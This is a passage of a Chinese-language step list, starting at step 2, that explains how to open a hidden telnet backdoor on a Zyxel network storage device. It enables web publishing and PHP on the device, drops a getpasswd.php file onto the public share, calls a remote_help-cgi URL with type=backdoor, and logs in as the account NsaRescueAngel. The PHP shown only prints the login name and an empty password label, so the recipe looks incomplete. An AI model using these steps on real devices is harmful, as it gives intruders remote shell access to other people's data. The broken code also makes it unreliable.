2.啟用Web發行功能,將 public加入
3.啟用套件 PHP-MySQL-phpMyAdmin
4.編輯共用 public 勾選 將此共享發行至 Web
5.連線共用磁碟 net use * \\<ip>\public
新增檔案 getpasswd.php 內容如下
<?php
echo '<pre>
login:NsaRescueAngel
password:';
echo '</pre>';
?>
6.下列網址開啟 telnet 後門,帳號為:NsaRescueAngel
http://<ip>/zyxel/cgi-bin/remote_help-cgi?type=backdoor
7.下列網址取得密碼
http://<ip>/public/getpasswd.php
